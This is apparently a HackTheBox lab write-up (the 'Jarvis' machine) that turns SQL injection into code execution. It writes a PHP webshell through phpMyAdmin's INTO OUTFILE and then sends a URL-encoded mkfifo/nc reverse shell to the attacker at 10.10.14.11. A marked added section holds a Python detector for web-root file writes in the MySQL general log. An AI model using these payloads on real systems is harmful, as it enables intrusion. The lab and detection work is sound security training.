SQLi to RCE
Logging in to the phpMyAdmin web GUI with the credentials extracted through SQLi earlier.
It is much cleaner and more organized to execute SQL queries from here.
The Query tab is where I can run SQL queries.
I previously confirmed that I have the FILE privilege (file read/write), which I can use to spawn a webshell.
I still have to locate the absolute path of the web root.
Dryrun
SELECT 'This is a dryrun' INTO OUTFILE '/var/www/html/test.txt'
I will run a test first, hoping that the web root is just the default Apache directory.
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ curl http://supersecurehotel.htb/test.txt
This is a dryrun
Success. It was the default directory.
Webshell
SELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE '/var/www/html/webshell.php';
Writing a simple PHP webshell into the webshell.php file at the web root.
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ curl -s 'http://supersecurehotel.htb/webshell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Code execution confirmed.
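Both the dryrun and the webshell above were written by the database server itself, so from a defender's side the evidence is in the MySQL/MariaDB general query log (general_log=ON, which is off by default) rather than in the web server logs: the file lands on disk owned by the mysql OS user, and the write only works because the FILE privilege was granted and secure_file_priv did not confine writes to a directory outside the web root (setting it to a safe directory, or to NULL, blocks this regardless of the privilege). The following added example, which is not part of this writeup, parses general-log lines for INTO OUTFILE / INTO DUMPFILE and flags any write that targets a web root; the log lines, timestamps and thread ids are constructed, and the WEB_ROOTS list is an assumed starting point to adapt per host.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample in MySQL general-query-log format (not real log data).
# The two web-root writes mirror the queries run through phpMyAdmin above;
# the last line is a legitimate export into the default secure_file_priv dir.
SAMPLE_GENERAL_LOG = """\
2023-05-01T12:00:01.000000Z\t   12 Query\tSELECT 'This is a dryrun' INTO OUTFILE '/var/www/html/test.txt'
2023-05-01T12:00:05.000000Z\t   12 Query\tSELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE '/var/www/html/webshell.php'
2023-05-01T12:00:09.000000Z\t   13 Query\tSELECT * FROM room WHERE cod=1
2023-05-01T12:00:12.000000Z\t   14 Query\tSELECT name FROM room INTO OUTFILE '/var/lib/mysql-files/rooms.csv'
"""

# Assumed web roots to watch; extend with whatever DocumentRoot the host uses.
WEB_ROOTS = ("/var/www/", "/srv/http/", "/usr/share/nginx/html/")
# Extensions the web server would execute rather than serve as static content.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".phar")

# General log layout: <timestamp>\t<thread id> <command>\t<argument>
LOG_LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
FILE_WRITE_RE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)


@dataclass
class FileWriteEvent:
    timestamp: str
    thread_id: int
    path: str
    in_web_root: bool
    executable: bool
    query: str


def parse_file_writes(log_text: str) -> List[FileWriteEvent]:
    """Return every INTO OUTFILE / DUMPFILE query found in the log text."""
    events = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        query = m.group("arg")
        w = FILE_WRITE_RE.search(query)
        if not w:
            continue
        path = w.group(2)
        events.append(FileWriteEvent(
            timestamp=m.group("ts"),
            thread_id=int(m.group("thread")),
            path=path,
            in_web_root=path.startswith(WEB_ROOTS),
            executable=path.lower().endswith(SCRIPT_EXTENSIONS),
            query=query,
        ))
    return events


def web_root_writes(log_text: str) -> List[FileWriteEvent]:
    """Only the writes that land under a web root; these are the alerts."""
    return [e for e in parse_file_writes(log_text) if e.in_web_root]


if __name__ == "__main__":
    for e in web_root_writes(SAMPLE_GENERAL_LOG):
        level = "CRITICAL" if e.executable else "WARNING"
        print(f"{level} {e.timestamp} thread={e.thread_id} wrote {e.path}")
```

Any hit in web_root_writes is worth an alert on its own; an executable extension raises it to critical because the next request to that path runs it as the web server user. The same thread id on both writes ties the dryrun and the webshell to one session, which is useful when reconstructing the timeline.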
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ curl -s 'http://supersecurehotel.htb/webshell.php?cmd=mkfifo%20%2Ftmp%2Fhayayq%3B%20nc%2010.10.14.11%209999%200%3C%2Ftmp%2Fhayayq%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fhayayq%202%3E%261%3B%20rm%20%2Ftmp%2Fhayayq'
Sending the URL-encoded mkfifo/nc reverse shell payload through the webshell.
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.143] 34352
whoami
www-data
hostname
jarvis
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.143 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:be29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:be29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:be:29 txqueuelen 1000 (Ethernet)
RX packets 1497508 bytes 299219883 (285.3 MiB)
RX errors 0 dropped 41 overruns 0 frame 0
TX packets 1484822 bytes 614658101 (586.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 4812 bytes 550091 (537.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4812 bytes 550091 (537.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the www-data user via SQLi to RCE.